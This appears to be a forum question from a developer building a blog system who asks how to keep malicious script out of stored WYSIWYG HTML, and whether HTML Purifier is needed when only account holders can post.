I'm in the process of building a small blog system to implement into our clients websites. I have built a simple wysiwyg text editor and everything works fine (almost...), but I store blog posts into a database. The problem is, I don't want malicious script to get into there. Also, if I escape the string, the HTML tags won't be able to format the text at the output (unless I'm unaware of something).
However, only people with accounts will be able to create a blog posts on their website (small business owners). So, if a password is needed to access the text editor, do I need to protect it as much? Do I need HTML Purifier or something? Am I simply on the wrong path of doing it?